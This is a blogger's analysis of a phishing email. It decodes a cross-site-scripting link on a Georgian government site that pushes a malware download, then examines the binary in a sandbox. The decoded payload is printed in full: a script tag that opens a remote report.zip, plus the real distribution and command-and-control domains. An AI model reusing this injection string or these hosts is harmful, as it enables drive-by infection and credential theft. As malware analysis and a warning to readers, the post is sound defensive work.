Naturally not clicking on the link for additional information, I turned to CNN, BBC and Google to confirm I did not miss Japan becoming the world's only nuclear triple-crown winner. After a cursory search, it appeared Japan was still merely a champion of the nuclear doubleheader. It irritated me though that I was getting these phishing e-mails so I decided to see where they were coming from.

For starters, what were the substitutions hiding? Character strings like %20 represent a hexadecimal value 0x20 (or 20h depending on your preference) that correlate to an ASCII index. Because a URL cannot contain spaces, using character substitutions allows a URL to put %20 in place of the space. It's typically used by digital miscreants for inserting shellcode in a text string, but can also be used to hide real text as numbers. Consulting a friendly ASCII table with hexadecimal lookups translates the "helpful link" into:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=">
<a href="http://officialweightlosshelp.org/mf-admin/report.zip">Download </a>
<script>window.open('http://officialweightlosshelp.org/wp-admin/report.zip')</script><"

So I turned to my VirtualBox testing environment from when I wrote What Traffic is on a TOR Relay and accessed the two websites to check them out safely without harming my machine.

At first glance, it would seem a site in Georgia was being exploited by a cross-site-scripting attack to redirect a viewer to a site that had been previously hacked (or fictitiously created) for file storage. Again, just a first glance would make somebody suspicious of Russian hackers from their previous cyber issues with Georgia and the targeting of American military over AKO. But that's just speculation - I'm not spending enough time on this to derive evidence to prove or disprove that theory.

Ultimately, all that really matters is the attack is designed to download the file report.zip to the user's computer. Performing a hex analysis showed it to be a true ZIP file so I used gzip in Linux to decompress it and then looked at it the EXE file with a hex editor.

The dump of the imports section of the Portable Executable file format reveals what functions this little program uses from various DLLs and Win32 API calls. It's a little easier to read simply using the command strings report.exe from the command line to dump human readable strings in lieu of finding them amidst the hexadecimal codes.

FormatMessageA
CloseHandle
ReadFile
CreateFileA
ExitProcess
GetFileType
HeapReAlloc
WaitForSingleObject
GetCurrentThread
LoadLibraryA
Sleep
GetStdHandle
HeapAlloc
HeapFree
GetProcessHeap
GetVersion
GetCommandLineA
GetModuleHandleA
KERNEL32.dll
InsertMenuW
LoadMenuW
DrawIconEx
CheckMenuItem
DispatchMessageA
PostThreadMessageA
CharNextExA
LoadStringA
wsprintfA
ExitWindowsEx
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DrawMenuBar
RemoveMenu
CheckMenuRadioItem
PostQuitMessage
TranslateMessage
DispatchMessageW
USER32.dll
ControlService
CloseServiceHandle
LookupPrivilegeValueA
AdjustTokenPrivileges
SetServiceStatus
SetSecurityDescriptorDacl
RegisterServiceCtrlHandlerA
RegEnumKeyA
RegSetValueExA
InitializeSecurityDescriptor
StartServiceCtrlDispatcherA
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
strcat
strcmp
strchr
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp

Now, without having to bother stepping through the code itself, it should be intuitively obvious to the most casual observer (as my high school physics teacher used to say) that the family of function calls center around privilege checks, registry access, heap calls, service access and the Windows clipboard. Those sound like the functions necessary for heap and buffer overrun exploitation with checks to confirm escalated privilege. That means the bug probably is the result of a race condition, hence the privilege check prior to installing whatever final features it deploys as a Windows service. More than likely, now that the host is part of a BotNet, the remainder of the infection code (probably a rootkit) will then be downloaded from a control center for installation under the newly assumed administrator privileges. No obvious strings existed for network access to obtain the remainder of the code, so its likely the code itself is obfuscated by an internal encryption algorithm - which is fine because I didn't want to spend time decoding opcode anyway.

Instead, I simply cloned a Windows sandbox in VirtualBox and allowed the infection to install itself while monitoring network activity with WireShark. Running a stock Windows XP without any service packs, I accessed the Georgian Ministry of Defense page with the URL whereupon the script did in fact execute the downloaded report.exe file. WireShark showed name resolution and activity subsequently to updatekernel.com which was the predicted behavior. This server has previously been identified as Chinese in association with the command and control for the Kneber BotNets and other identity theft Phishing activities. Needless to say, this variation did not show up on either Symantec or ClamAV virus scanners which may be a function of encrypting obfuscation or simply an updated variant with a new signature.

[Post Edit 1] I actually re-ran this test today and found that apparently the particular link no longer works. It would seem the Georgian Ministry of Defense patched the vulnerability on their website that allowed the link to go through, but I'd saved a copy of the report.exe binary from before. I reverted the Windows XP sandbox to a pre-infection VirtualBox snapshot in order to install Service Pack 2. This was a necessary requirement for installing ProcessMonitor from Mark Russinovich's fabled SysInternals toolkit. The output above shows the output where processmonitor logged all of report.exe's activity to the registry and filesystem as it executed. A complete 35 page log is available here for your own perusal, but a lot of activity focuses around browsing the Internet cache, the stored certificates and the cryptologic functions. There was also a series of tests regarding registry accesses and post-clipboard functions. A more thorough analysis with a Win32 debugger to correlate each activity to a code section would, of course, provide a more detailed breakdown. The bottom line, it takes under two seconds for the code to execute, compromise your system and locate information that could be used to impersonate you or clone your credentials.

Let this be just another simple lesson of why you should not click on links sent to you in e-mails. Unless you like being part of a Russian/Chinese/DPRK BotNet and having your identity stolen.

[Post Edit 2] I couldn't resist. My cousin pointed me towards a shareware Win32 debugger called OllyDbg so I went ahead and copied that into my sandbox. The last time I used to do this sort of thing, I was using the old-school DOS debug and Borland debuggers. Once again, I reverted to an older, pre-infection snapshot and loaded the report.exe file. Just as predicted, while the code loaded and OllyDbg performed its heuristic analysis, it indicated the primary code section was likely compressed or encrypted (as any attack should be). I think I've found my next source of distraction, I'm not going to be able to resist diving back into the world of reversing code puzzles. 0111 1010 0110 1001